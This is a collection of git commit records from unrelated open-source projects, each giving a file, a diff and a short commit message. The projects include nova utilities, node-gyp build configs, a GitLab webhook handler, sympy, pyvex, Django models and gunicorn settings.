application_filter(app_filter, application): return app_filter is None or application.startswith(app_filter) def walk_service_map(application_map, application_callback, service_callback): for application, service_map in application_map.iteritems(): if application_callback: application_callback(application) for service, service_definition in service_map.iteritems(): if service_callback: service_callback(service_definition) def pretty_print_application(app): logging.error(u"{}".format(app)) def pretty_print_service(service_definition): logging.warn(u"\t {}".format(service_definition.get_role())) for dat in service_definition: secondary_indent = '\t\t' if len(dat) <= 10 else '\t' logging.info(u"\t\t {}{}- {}".format(dat, secondary_indent, service_definition[dat])) def pretty_print_services(application_map): walk_service_map(application_map, pretty_print_application, pretty_print_service) def safe_mkdir(destination_directory): if not os.path.exists(destination_directory): os.mkdir(destination_directory) def ensure_service_directory_exists(destination_directory, service_defintion): app_dir = os.path.join(destination_directory, service_defintion.get_app()) safe_mkdir(app_dir) return app_dir def invoke_process(args, exec_dir=None, dry_run=False): if dry_run: print_red_bold(u"\t {}".format(str(args))) return 0 else: arg_list = {'args': args} if exec_dir: arg_list['cwd'] = exec_dir return subprocess.call(**arg_list)
Python
0.000003
@@ -4521,24 +4521,71 @@ run=False):%0A + print_red_bold(u%22%5Ct %7B%7D%22.format(str(args)))%0A if dry_r
a57e38233679bf6d95dad533d87ce1c69c00cc26
Include process name
docker-memusage.py
docker-memusage.py
#!/usr/bin/env python from collections import OrderedDict from pprint import pprint import os.path import re import sys def parse_mem_file(filename): data = OrderedDict() with open(filename, 'rb') as f: for line in f: splittage = line.split(':') data[splittage[0]] = splittage[1].strip() return data def get_system_mem_usage(): """Return the information in /proc/meminfo as a dictionary.""" return parse_mem_file('/proc/meminfo') def get_process_mem_usage(): re_pid = re.compile(r'^\d+$') re_mem = re.compile(r'^(\d+) .+$') pid2usage = {} for pid in [d for d in os.listdir('/proc') if re_pid.match(d)]: fpath = os.path.join('/proc', pid, 'status') try: data = parse_mem_file(fpath) except IOError: continue try: pid2usage[pid] = int(re_mem.match(data['VmHWM']).group(1)) / 1024. except KeyError: continue return OrderedDict( sorted(pid2usage.iteritems(), key=lambda x: x[1], reverse=True)) pid2usage = get_process_mem_usage() total_usage = sum(pid2usage.values()) print('Total memory usage: {:.2f}'.format(total_usage)) for pid, usage in pid2usage.iteritems(): print('{}: {:.2f} MB'.format(pid, usage))
Python
0.000002
@@ -55,34 +55,8 @@ ict%0A -from pprint import pprint%0A impo @@ -80,19 +80,8 @@ re%0A -import sys%0A %0A%0Ade @@ -795,32 +795,64 @@ e%0A%0A try:%0A + name = data%5B'name'%5D%0A pid2 @@ -861,19 +861,27 @@ age%5B +( pid +, name) %5D = int( re_m @@ -876,16 +876,33 @@ %5D = int( +%0A re_mem.m @@ -1222,16 +1222,20 @@ %0Afor pid +_etc , usage @@ -1256,24 +1256,46 @@ teritems():%0A + %5Bpid, name%5D = pid%0A print('%7B @@ -1295,16 +1295,21 @@ rint('%7B%7D + (%7B%7D) : %7B:.2f%7D @@ -1320,16 +1320,22 @@ .format( +name, pid, usa
57b707b7f7e7076f8c1f84e57ba3a3db45135340
Fix compilations for macos mountain lion
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "protobuf_for_node", "include_dirs": ["protobuf/src"], "dependencies": ["protobuf/protobuf.gyp:protobuf_full_do_not_use"], "sources": [ "protobuf_for_node.cc", "addon.cc" ] } ] }
Python
0.000006
@@ -215,16 +215,187 @@ don.cc%22%0A +%09%09%09%5D,%0A%09%09%09'conditions': %5B%0A%09%09%09%09%5B%0A%09%09%09%09%09'OS ==%22mac%22',%7B%0A%09%09%09%09%09%09'xcode_settings':%7B%0A%09%09%09%09%09%09 'OTHER_CFLAGS' : %5B%0A%09%09%09%09%09%09%09'-mmacosx-version-min=10.7'%0A%09%09%09%09%09%09 %5D%0A%09%09%09%09%09%09%7D%0A%09%09%09 %09%09%7D%0A%09%09%09%09%5D%0A %09%09%09%5D%0A%09%09%7D
644fbef7030f0685be7dd056606ab23daaefdc72
Fix typo in error message variable
app/gitlab.py
app/gitlab.py
from __future__ import absolute_import from __future__ import unicode_literals from .webhooks import WebHook from werkzeug.exceptions import BadRequest, NotImplemented EVENTS = { 'Push Hook': 'push', 'Tag Push Hook': 'tag_push', 'Issue Hook': 'issue', 'Note Hook': 'note', 'Merge Request Hook': 'merge_request' } class GitlabWebHook(WebHook): def event(self, request): gitlab_header = request.headers.get('X-Gitlab-Event', None) if not gitlab_header: raise BadRequest('Gitlab requests must provide a X-Gitlab-Event header') event = EVENTS.get(gitlab_header, None) if not event: raise NotImplemented('Header not understood %s' % githab_header) if event == 'note': if 'commit' in request.json: event = 'commit_comment' elif 'merge_request' in request.json: event = 'merge_request_comment' elif 'issue' in request.json: event = 'issue_comment' elif 'snippet' in request.json: event = 'snippet_comment' return event
Python
0.000178
@@ -709,17 +709,17 @@ s' %25 git -h +l ab_heade
893b9947ef8d884ff67c84a60ea2c251b408a6d0
update build_db.py script
build_db.py
build_db.py
import json import os import sqlite3 WEEKDAYS = 0x1 SATURDAY = 0x2 SUNDAY = 0x3 def setup(conn): cursor = conn.cursor() cursor.execute( ''' CREATE TABLE IF NOT EXISTS visit ( stop_num text, visit_day_type integer, route_num integer, hour integer, minute integer ) ''' ) cursor.execute('CREATE INDEX visit_stop_num_idx ON visit (stop_num);') def dump_data(data, conn): cursor = conn.cursor() for stop_num, day_types in data.items(): types = zip([WEEKDAYS, SATURDAY, SUNDAY], day_types) for day_type_num, day_type in types: for visit in day_type: hour, minute = map(int, visit[1].split(':')) cursor.execute( 'INSERT INTO visit VALUES (?, ?, ?, ?, ?)', ( str(stop_num), day_type_num, visit[0], hour, minute ) ) def main(): db = 'Assets/transperthcache.db' if os.path.exists(db): os.unlink(db) conn = sqlite3.connect(db) setup(conn) with open('transperthcache.json') as fh: dump_data( json.load(fh), conn ) conn.commit() if __name__ == '__main__': main()
Python
0.000001
@@ -457,16 +457,202 @@ um);')%0A%0A + cursor.execute(%0A 'CREATE TABLE %22android_metadata%22 (%22locale%22 TEXT DEFAULT %22en_US%22);'%0A )%0A cursor.execute(%0A 'INSERT INTO %22android_metadata%22 VALUES (%22en_US%22)'%0A )%0A%0A %0Adef dum @@ -1302,17 +1302,17 @@ db = ' -A +a ssets/tr @@ -1565,16 +1565,33 @@ ommit()%0A + conn.close()%0A %0A%0Aif __n
7f01aa6deaa9a13ca388fb4c84849bce53d34d5f
Make sure C++11 is used under Mac OS
binding.gyp
binding.gyp
{ "targets": [{ "target_name": "mmap-io", "sources": [ "src/mmap-io.cc" ], "include_dirs": [ "<!(node -e \"require('nan')\")" ], "cflags_cc": [ "-std=c++11" ] }] }
Python
0
@@ -218,16 +218,339 @@ =c++11%22%0A + %5D,%0A %22conditions%22: %5B%0A %5B 'OS==%22mac%22',%0A %7B %22xcode_settings%22: %7B%0A 'OTHER_CPLUSPLUSFLAGS' : %5B'-std=c++11','-stdlib=libc++'%5D,%0A 'OTHER_LDFLAGS': %5B'-stdlib=libc++'%5D,%0A 'MACOSX_DEPLOYMENT_TARGET': '10.7'%0A %7D%7D%0A %5D%0A
6b6948b4dcf7400eefcfb2a499c0180d03052550
Remove unnecessary string formatting
sympy/matrices/expressions/dotproduct.py
sympy/matrices/expressions/dotproduct.py
from __future__ import print_function, division from sympy.core import Basic from sympy.core.sympify import _sympify from sympy.matrices.expressions.transpose import transpose from sympy.matrices.expressions.matexpr import MatrixExpr class DotProduct(MatrixExpr): """ Dot Product of vector matrices """ def __new__(cls, arg1, arg2): arg1, arg2 = _sympify((arg1, arg2)) if not arg1.is_Matrix: raise TypeError("Argument 1 of DotProduct is not a matrix" % str(arg1)) if not arg2.is_Matrix: raise TypeError("Argument 2 of DotProduct is not a matrix" % str(arg2)) if not (1 in arg1.shape): raise TypeError("Argument 1 of DotProduct is not a vector" % str(arg1)) if not (1 in arg2.shape): raise TypeError("Argument 2 of DotProduct is not a vector" % str(arg1)) if arg1.shape != arg2.shape: raise TypeError("Input to Dot Product, %s and %s, are not of same dimensions" % (str(arg1), str(arg2))) return Basic.__new__(cls, arg1, arg2) def doit(self, expand=False): try: if self.args[0].shape[0] == 1: return (self.args[0]*transpose(self.args[1])).doit()[0] else: return (transpose(self.args[0])*self.args[1]).doit()[0] except (AttributeError, NotImplementedError): return self
Python
0.005099
@@ -496,28 +496,16 @@ matrix%22 - %25 str(arg1) )%0A @@ -603,20 +603,8 @@ rix%22 - %25 str(arg2) )%0A @@ -705,28 +705,16 @@ vector%22 - %25 str(arg1) )%0A @@ -815,20 +815,8 @@ tor%22 - %25 str(arg1) )%0A%0A
a6dff532d75d0a63c59db0cbf800587845d587a1
add compiler flag
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "addon", "sources": [ "src/addon.cc", "src/object.cc", "src/async.cc", "src/engine.cc", "src/results.cc" ], "cflags": [ "-O2", "-Wendif-labels", "-Werror", "-Wpedantic", "-Wunused-parameter", "-finline-functions", "-funswitch-loops", "-fpredictive-commoning", "-fgcse-after-reload", "-ftree-vectorize", "-fvect-cost-model", "-ftree-partial-pre" ], "cflags!": [ "-Wno-unused-parameter", "-O3" ], "cflags_cc": [ "-std=gnu++11" ], "cflags_cc!": [ "-fno-exceptions", "-fno-rtti", "-std=gnu++1y", "-std=gnu++0x" ], "include_dirs": ["<!@(node -p \"require('node-addon-api').include\")"], "dependencies": ["<!(node -p \"require('node-addon-api').gyp\")"], "defines": [ "NAPI_CPP_EXCEPTIONS", "NODE_ADDON_API_DISABLE_DEPRECATED" ], "conditions": [ ["OS==\"win\"", { "msvs_settings": { "VCCLCompilerTool": { "ExceptionHandling": 1 } } }], ["OS==\"mac\"", { "xcode_settings": { "CLANG_CXX_LANGUAGE_STANDARD": 'c++11', "CLANG_CXX_LIBRARY": "libc++", "GCC_ENABLE_CPP_EXCEPTIONS": "YES", "MACOSX_DEPLOYMENT_TARGET": "10.7", "GCC_ENABLE_CPP_RTTI" : "YES", # "fast", "3", "2", "1", "0", "", "s" "GCC_OPTIMIZATION_LEVEL": "2", # only passed to C files "OTHER_CFLAGS" : [], # remove defaults passed to C files "OTHER_CFLAGS!": [ "-fno-strict-aliasing" ], # only passed to C++ files "OTHER_CPLUSPLUSFLAGS": [], # remove defaults passed to C++ files "OTHER_CPLUSPLUSFLAGS!": [], # passed to both C/C++ files "WARNING_CFLAGS": [ "-Werror", "-Wextra", "-Wpedantic", "-Wunused-parameter" ], # remove defaults passed to both C/C++ files "WARNING_CFLAGS!": [ "-Wno-unused-parameter", "-W" ] } }] ] } ] } # several options for flags, cflags_cc(appends), cflags_cc+(prepends), cflags_cc!(negates) # if -O3 and -O2 are both passed, whichever is passed last wins the race # see https://github.com/nodejs/node/blob/master/common.gypi
Python
0.000002
@@ -429,16 +429,34 @@ ial-pre%22 +, %22-fipa-cp-clone%22 %5D,%0A%0A
5e2ef9885a65d61edcdffaef9e4f8a960bef567e
Refactor CAS tests.
fridge/test/test_cas.py
fridge/test/test_cas.py
import pytest from fridge.cas import ContentAddressableStorage from fridge.memoryfs import MemoryFS class TestContentAddressableStorage(object): def create_cas(self, fs=None, path='cas'): if fs is None: fs = MemoryFS() return ContentAddressableStorage(path, fs) def has_root_property(self): cas = self.create_cas(path='cas_root') assert cas.root == 'cas_root' def test_allows_to_store_and_retrieve_files(self): fs = MemoryFS() cas = self.create_cas(fs) with fs.open('testfile', 'w') as f: f.write(u'dummy content') key = cas.store('testfile') # Close and reopen del cas cas = self.create_cas(fs) with fs.open(cas.get_path(key), 'r') as f: content = f.read() assert content == u'dummy content' def test_file_removed_after_store(self): fs = MemoryFS() cas = self.create_cas(fs) with fs.open('testfile', 'w') as f: f.write(u'dummy content') cas.store('testfile') assert not fs.exists('testfile') def test_writing_original_files_keeps_stored_file_unchanged(self): fs = MemoryFS() cas = self.create_cas(fs) with fs.open('testfile', 'w') as f: f.write(u'dummy content') key = cas.store('testfile') del cas # Close with fs.open('testfile', 'w') as f: f.write(u'replaced content') cas = self.create_cas(fs) with fs.open(cas.get_path(key), 'r') as f: content = f.read() assert content == u'dummy content' def test_stores_blobs_write_protected(self): fs = MemoryFS() cas = self.create_cas(fs) with fs.open('testfile', 'w') as f: f.write(u'dummy content') key = cas.store('testfile') with pytest.raises(OSError): with fs.open(cas.get_path(key), 'w'): pass
Python
0
@@ -73,182 +73,205 @@ dge. -memoryfs import MemoryFS%0A%0A%0Aclass TestContentAddressableStorage(object):%0A def create_cas(self, fs=None, path='cas'):%0A if fs is None:%0A fs = MemoryFS()%0A +fstest import (%0A assert_file_content_equal, assert_open_raises, write_file)%0Afrom fridge.memoryfs import MemoryFS%0A%0A%[email protected]%0Adef fs():%0A return MemoryFS()%0A%0A%[email protected]%0Adef cas(fs):%0A @@ -307,19 +307,66 @@ age( -path +'cas' , fs)%0A%0A +%0Aclass TestContentAddressableStorage(object):%0A @@ -387,24 +387,28 @@ roperty(self +, fs ):%0A c @@ -416,28 +416,38 @@ s = -self.create_cas(path +ContentAddressableStorage(root ='ca @@ -453,16 +453,23 @@ as_root' +, fs=fs )%0A @@ -557,149 +557,120 @@ self -):%0A fs = MemoryFS()%0A cas = self.create_cas(fs)%0A with fs.open('testfile', 'w') as f:%0A f.write(u'dummy content' +, fs):%0A write_file(fs, 'testfile', u'dummy content')%0A cas = ContentAddressableStorage('cas', fs=fs )%0A @@ -760,32 +760,52 @@ cas = -self.create_cas( +ContentAddressableStorage('cas', fs= fs)%0A @@ -918,32 +918,33 @@ dummy content'%0A%0A +%0A def test_fil @@ -973,68 +973,19 @@ self -):%0A fs = MemoryFS()%0A cas = self.create_cas(fs) +, fs, cas): %0A @@ -1207,149 +1207,121 @@ self -):%0A fs = MemoryFS()%0A cas = self.create_cas(fs)%0A with fs.open('testfile', 'w') as f:%0A f.write(u'dummy content' +, fs):%0A write_file(fs, 'testfile', u'dummy content')%0A%0A cas = ContentAddressableStorage('cas', fs=fs )%0A @@ -1385,36 +1385,38 @@ e%0A%0A w +r it -h fs.open( +e_file(fs, 'testfile', @@ -1419,39 +1419,8 @@ e', -'w') as f:%0A f.write( u're @@ -1454,484 +1454,119 @@ s = -self.create_cas(fs)%0A with fs.open(cas.get_path(key), 'r') as f:%0A content = f.read()%0A assert content == u'dummy content'%0A%0A def test_stores_blobs_write_protected(self):%0A fs = MemoryFS()%0A cas = self.create_cas(fs)%0A with fs.open('testfile', 'w') as f:%0A f.write(u'dummy content')%0A key = cas.store('testfile')%0A%0A with pytest.raises(OSError):%0A with fs.open(cas.get_path(key), 'w'):%0A pass +ContentAddressableStorage('cas', fs=fs)%0A assert_file_content_equal(fs, cas.get_path(key), u'dummy content') %0A
167101baa4d57d22bc6a40d7ff8afd3688e23580
fix ControlText focusout bug
pyforms/gui/Controls/ControlText.py
pyforms/gui/Controls/ControlText.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' @author: Ricardo Ribeiro @credits: Ricardo Ribeiro @license: MIT @version: 0.0 @maintainer: Ricardo Ribeiro @email: [email protected] @status: Development @lastEditedBy: Carlos Mão de Ferro ([email protected]) ''' from pyforms.gui.Controls.ControlBase import ControlBase import pyforms.Utils.tools as tools from PyQt4 import uic class ControlText(ControlBase): def initForm(self): control_path = tools.getFileInSameDirectory(__file__, "textInput.ui") self._form = uic.loadUi(control_path) self.form.label.setText(self._label) self.form.lineEdit.setText(self._value) self.form.setToolTip(self.help) super(ControlText, self).initForm() self.form.lineEdit.editingFinished.connect(self.finishEditing) def finishEditing(self): """Function called when the lineEdit widget is edited""" self.changed() self.form.lineEdit.focusNextChild() ################################################################### ############ Properties ########################################### ################################################################### @property def value(self): self._value = str(self._form.lineEdit.text()) return self._value @value.setter def value(self, value): self._form.lineEdit.setText(value) ControlBase.value.fset(self, value) @property def label(self): return self.form.label.text() @label.setter def label(self, value): self.form.label.setText(value) ControlBase.label.fset(self, value)
Python
0
@@ -891,44 +891,8 @@ )%0A%09%09 -self.form.lineEdit.focusNextChild()%0A %0A%09##
22cf663731bc556ef625695ab3213e87432ed4f9
fix docs link
pyvex/__init__.py
pyvex/__init__.py
""" PyVEX provides an interface that translates binary code into the VEX intermediate represenation (IR). For an introduction to VEX, take a look here: https://docs.angr.io/docs/ir.html """ __version__ = (8, 19, 4, 5) if bytes is str: raise Exception("This module is designed for python 3 only. Please install an older version to use python 2.") import os import sys import cffi import pkg_resources from .vex_ffi import ffi_str as _ffi_str ffi = cffi.FFI() import logging logging.getLogger("pyvex").addHandler(logging.NullHandler()) def _find_c_lib(): # Load the c library for calling into VEX if sys.platform in ('win32', 'cygwin'): library_file = 'pyvex.dll' elif sys.platform == 'darwin': library_file = "libpyvex.dylib" else: library_file = "libpyvex.so" pyvex_path = pkg_resources.resource_filename(__name__, os.path.join('lib', library_file)) ffi.cdef(_ffi_str) # RTLD_GLOBAL used for sim_unicorn.so lib = ffi.dlopen(pyvex_path) lib.vex_init() # this looks up all the definitions (wtf) dir(lib) return lib pvc = _find_c_lib() # pylint: disable=wildcard-import from .enums import * from . import stmt, expr, const from .block import IRSB, IRTypeEnv from .expr import get_op_retty from .const import tag_to_const_class, get_type_size, get_type_spec_size from .lifting import lift, lifters from .errors import PyVEXError # aliases.... IRStmt = stmt IRExpr = expr IRConst = const
Python
0
@@ -170,20 +170,26 @@ .io/ -docs/ir.html +advanced-topics/ir %0A%22%22%22
d9a034e74bf03a5a9837201d2e358d51e759f112
add dc_aware_policy
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "cassandra-native", "sources": [ "cpp-driver/src/address.cpp", "cpp-driver/src/auth.cpp", "cpp-driver/src/auth_requests.cpp", "cpp-driver/src/auth_responses.cpp", "cpp-driver/src/batch_request.cpp", "cpp-driver/src/buffer.cpp", "cpp-driver/src/buffer_collection.cpp", "cpp-driver/src/cluster.cpp", "cpp-driver/src/cluster_metadata.cpp", "cpp-driver/src/collection_iterator.cpp", "cpp-driver/src/common.cpp", "cpp-driver/src/connection.cpp", "cpp-driver/src/control_connection.cpp", "cpp-driver/src/error_response.cpp", "cpp-driver/src/event_response.cpp", "cpp-driver/src/execute_request.cpp", "cpp-driver/src/future.cpp", "cpp-driver/src/get_time.cpp", "cpp-driver/src/handler.cpp", "cpp-driver/src/io_worker.cpp", "cpp-driver/src/iterator.cpp", "cpp-driver/src/logger.cpp", "cpp-driver/src/map_iterator.cpp", "cpp-driver/src/md5.cpp", "cpp-driver/src/multiple_request_handler.cpp", "cpp-driver/src/murmur3.cpp", "cpp-driver/src/pool.cpp", "cpp-driver/src/prepare_handler.cpp", "cpp-driver/src/prepare_request.cpp", "cpp-driver/src/prepared.cpp", "cpp-driver/src/query_request.cpp", "cpp-driver/src/register_request.cpp", "cpp-driver/src/replication_strategy.cpp", "cpp-driver/src/request_handler.cpp", "cpp-driver/src/response.cpp", "cpp-driver/src/result_metadata.cpp", "cpp-driver/src/result_response.cpp", "cpp-driver/src/ring_buffer.cpp", "cpp-driver/src/row.cpp", "cpp-driver/src/schema_change_handler.cpp", "cpp-driver/src/schema_metadata.cpp", "cpp-driver/src/session.cpp", "cpp-driver/src/set_keyspace_handler.cpp", "cpp-driver/src/ssl.cpp", "cpp-driver/src/startup_request.cpp", "cpp-driver/src/statement.cpp", "cpp-driver/src/supported_response.cpp", "cpp-driver/src/testing.cpp", "cpp-driver/src/token_aware_policy.cpp", "cpp-driver/src/token_map.cpp", "cpp-driver/src/type_parser.cpp", "cpp-driver/src/types.cpp", "cpp-driver/src/uuids.cpp", "cpp-driver/src/value.cpp" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "cpp-driver/include", "cpp-driver/src/third_party/boost", "cpp-driver/src/third_party/rapidjson" ], "defines": [ "DISABLE_UUID_GENERATION" ] } ] }
Python
0.000039
@@ -621,32 +621,78 @@ onnection.cpp%22,%0A + %22cpp-driver/src/dc_aware_policy.cpp%22,%0A %22cpp-dri
fb53f764a82dd8e6d1992c4c254e90c185fd9c53
Change socket type in nova.utils.get_my_ip() to SOCK_DGRAM. This way, we don't actually have to set up a connection. Also, change the destination host to an IP (chose one of Google's DNS's at random) rather than a hostname, so we avoid doing a DNS lookup.
nova/utils.py
nova/utils.py
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ System-level utilities and helper functions. """ import datetime import inspect import logging import os import random import subprocess import socket import sys from xml.sax import saxutils from twisted.internet.threads import deferToThread from nova import exception from nova import flags from nova.exception import ProcessExecutionError FLAGS = flags.FLAGS TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ" def import_class(import_str): """Returns a class from a string including module and class""" mod_str, _sep, class_str = import_str.rpartition('.') try: __import__(mod_str) return getattr(sys.modules[mod_str], class_str) except (ImportError, ValueError, AttributeError): raise exception.NotFound('Class %s cannot be found' % class_str) def import_object(import_str): """Returns an object including a module or module and class""" try: __import__(import_str) return sys.modules[import_str] except ImportError: cls = import_class(import_str) return cls() def fetchfile(url, target): logging.debug("Fetching %s" % url) # c = pycurl.Curl() # fp = open(target, "wb") # c.setopt(c.URL, url) # c.setopt(c.WRITEDATA, fp) # c.perform() # c.close() # fp.close() execute("curl --fail %s -o %s" % (url, target)) def execute(cmd, process_input=None, addl_env=None, check_exit_code=True): logging.debug("Running cmd: %s", cmd) env = os.environ.copy() if addl_env: env.update(addl_env) obj = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) result = None if process_input != None: result = obj.communicate(process_input) else: result = obj.communicate() obj.stdin.close() if obj.returncode: logging.debug("Result was %s" % (obj.returncode)) if check_exit_code and obj.returncode != 0: (stdout, stderr) = result raise ProcessExecutionError(exit_code=obj.returncode, stdout=stdout, stderr=stderr, cmd=cmd) return result def abspath(s): return os.path.join(os.path.dirname(__file__), s) def default_flagfile(filename='nova.conf'): for arg in sys.argv: if arg.find('flagfile') != -1: break else: if not os.path.isabs(filename): # turn relative filename into an absolute path script_dir = os.path.dirname(inspect.stack()[-1][1]) filename = os.path.abspath(os.path.join(script_dir, filename)) if os.path.exists(filename): flagfile = ['--flagfile=%s' % filename] sys.argv = sys.argv[:1] + flagfile + sys.argv[1:] def debug(arg): logging.debug('debug in callback: %s', arg) return arg def runthis(prompt, cmd, check_exit_code=True): logging.debug("Running %s" % (cmd)) exit_code = subprocess.call(cmd.split(" ")) logging.debug(prompt % (exit_code)) if check_exit_code and exit_code != 0: raise ProcessExecutionError(exit_code=exit_code, stdout=None, stderr=None, cmd=cmd) def generate_uid(topic, size=8): characters = '01234567890abcdefghijklmnopqrstuvwxyz' choices = [random.choice(characters) for x in xrange(size)] return '%s-%s' % (topic, ''.join(choices)) def generate_mac(): mac = [0x02, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff)] return ':'.join(map(lambda x: "%02x" % x, mac)) def last_octet(address): return int(address.split(".")[-1]) def get_my_ip(): """Returns the actual ip of the local machine.""" if getattr(FLAGS, 'fake_tests', None): return '127.0.0.1' try: csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) csock.connect(('www.google.com', 80)) (addr, port) = csock.getsockname() csock.close() return addr except socket.gaierror as ex: logging.warn("Couldn't get IP, using 127.0.0.1 %s", ex) return "127.0.0.1" def isotime(at=None): if not at: at = datetime.datetime.utcnow() return at.strftime(TIME_FORMAT) def parse_isotime(timestr): return datetime.datetime.strptime(timestr, TIME_FORMAT) class LazyPluggable(object): """A pluggable backend loaded lazily based on some value.""" def __init__(self, pivot, **backends): self.__backends = backends self.__pivot = pivot self.__backend = None def __get_backend(self): if not self.__backend: backend_name = self.__pivot.value if backend_name not in self.__backends: raise exception.Error('Invalid backend: %s' % backend_name) backend = self.__backends[backend_name] if type(backend) == type(tuple()): name = backend[0] fromlist = backend[1] else: name = backend fromlist = backend self.__backend = __import__(name, None, None, fromlist) logging.info('backend %s', self.__backend) return self.__backend def __getattr__(self, key): backend = self.__get_backend() return getattr(backend, key) def deferredToThread(f): def g(*args, **kwargs): return deferToThread(f, *args, **kwargs) return g def xhtml_escape(value): """Escapes a string so it is valid within XML or XHTML. Code is directly from the utf8 function in http://github.com/facebook/tornado/blob/master/tornado/escape.py """ return saxutils.escape(value, {'"': "&quot;"}) def utf8(value): """Try to turn a string into utf-8 if possible. Code is directly from the utf8 function in http://github.com/facebook/tornado/blob/master/tornado/escape.py """ if isinstance(value, unicode): return value.encode("utf-8") assert isinstance(value, str) return value
Python
0
@@ -4800,12 +4800,11 @@ OCK_ -STRE +DGR AM)%0A @@ -4831,22 +4831,15 @@ t((' -www.google.com +8.8.8.8 ', 8
73b66a32763b7efe36612db7f3a3b4566d8e44a2
set uid=197610(OIdiot) gid=197610 groups=197610 as primary_key instead of
app/models.py
app/models.py
from django.db import models # Create your models here. class Person(models.Model): student_number = models.CharField(verbose_name = '学号', max_length = 12, unique = True, primary_key = True) name = models.CharField(verbose_name = '姓名', max_length = 10) pinyin = models.CharField(verbose_name = '拼音', max_length = 25) gender = models.CharField(verbose_name = '性别', choices = (('F', 'Female'), ('M', 'Male')), max_length = 2) native_province = models.CharField(verbose_name = '籍贯', max_length = 10, blank = True) dormitory = models.CharField(verbose_name = '寝室', blank = True, max_length = 7) birthday = models.DateField(verbose_name = '生日', blank = True) phone_number = models.CharField(verbose_name = '手机号码', max_length = 11, blank = True) position = models.CharField(verbose_name = '职务', max_length = 20, blank = True) participation = models.PositiveSmallIntegerField(verbose_name = '活动参与分', default = 0) def __unicode__(self): return self.name def __str__(self): return self.name class Activity(models.Model): id = models.AutoField(verbose_name = '索引', primary_key = True, unique = True) name = models.CharField(verbose_name = '活动名称', max_length = 15) date = models.DateField(verbose_name = '日期', blank = True) time = models.TimeField(verbose_name = '开始时间', blank = True) place = models.CharField(verbose_name = '地点', max_length = 15, blank = True) content = models.TextField(verbose_name = '内容', blank = True) participation = models.SmallIntegerField(verbose_name = '参与得分', default = 0) participator = models.TextField(verbose_name = '参与者学号', blank = True) images = models.TextField(verbose_name = '相关图片urls', blank = True) def __unicode__(self): return self.name def __str__(self): return self.name
Python
0.000001
@@ -80,16 +80,95 @@ Model):%0A +%09id = models.AutoField(verbose_name = '%E7%B4%A2%E5%BC%95', primary_key = True, unique = True)%0A %09student @@ -244,28 +244,8 @@ ue = - True, primary_key = Tru
68170652d104873ea4fa210daaedb05ba9bf3b44
Wrong syntax
config/gunicorn_conf.py
config/gunicorn_conf.py
import os import psutil import math GIGS_OF_MEMORY = psutil.virtual_memory().total/1024/1024/1024. NUM_CPUS = psutil.cpu_count() bind = "0.0.0.0:8000" pidfile = "/srv/newsblur/logs/gunicorn.pid" logfile = "/srv/newsblur/logs/production.log" accesslog = "/srv/newsblur/logs/production.log" errorlog = "/srv/newsblur/logs/errors.log" loglevel = "info" name = "newsblur" timeout = 120 max_requests = 1000 x_forwarded_for_header = "X-FORWARDED-FOR" forwarded_allow_ips = "*" limit_request_line = 16000 limit_request_fields = 1000 worker_tmp_dir = /dev/shm if GIGS_OF_MEMORY > NUM_CPUS: workers = NUM_CPUS else: workers = int(NUM_CPUS / 2) if workers <= 4: workers = max(int(math.floor(GIGS_OF_MEMORY * 1000 / 512)), 4) if workers > 8: workers = 8 if os.environ.get('DOCKERBUILD', False): workers = 1
Python
0.930983
@@ -542,16 +542,17 @@ r = +%22 /dev/shm %0A%0Aif @@ -547,16 +547,17 @@ /dev/shm +%22 %0A%0Aif GIG
c908db488f3e1d7aab0993780b38baaf4c995eb1
add docstrings
Lib/fontelemetry/datastructures/source.py
Lib/fontelemetry/datastructures/source.py
# Copyright 2019 Fontelemetry Authors and Contributors # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Library version from fontelemetry import __version__ # ----------------------- # Base classes # ----------------------- class Source(object): def __init__(self, source_object, path=None, source_id=None): self.obj = source_object self.path = path self.id = source_id def __repr__(self): return "({} v{} is defined as: {})".format(self.__class__, __version__, self.__dict__) def __str__(self): return "{}".format(self.__dict__) def get_source_path(self): return self.path def yield_ordered_glyphobj(self): raise NotImplementedError # ------------------------------------ # Inherited classes # ------------------------------------ class GlyphsSource(Source): def __init__(self, source_object, path=None, source_id=None): Source.__init__(self, source_object, path=path, source_id=source_id) def yield_ordered_glyphobj(self): for glyph in self.obj.glyphs: yield glyph class UFOSource(Source): def __init__(self, source_object, path=None, source_id=None): Source.__init__(self, source_object, path=path, source_id=source_id) def yield_ordered_glyphobj(self): # TODO pass
Python
0
@@ -746,69 +746,1194 @@ -def __init__(self, source_object, path=None, source_id=None): +%22%22%22A source specification specific object that holds source data.%0A%0A The Source object is instantiated with an external library object that%0A is instantiated on source read and used to manipulate source file data%0A along with object attributes that maintain the original source file path%0A and define a retrievable calling code defined unique ID field.%0A%0A Attributes:%0A obj: (instance-specific) A source file object that is instantiated with an external library%0A path: (string) source file or directory path%0A id: (string) unique ID for an instantiated Source object%0A%0A For glyphs source, the object is a glyphsLib.GSFont object.%0A For UFO source, the object is a fontTools.ufoLib.glifLib.GlyphSet object%0A %22%22%22%0A def __init__(self, source_object, path=None, source_id=None):%0A %22%22%22Inits Source object with source file read data from external libraries.%0A%0A Args:%0A source_object: (instance-specific) A source file object that is 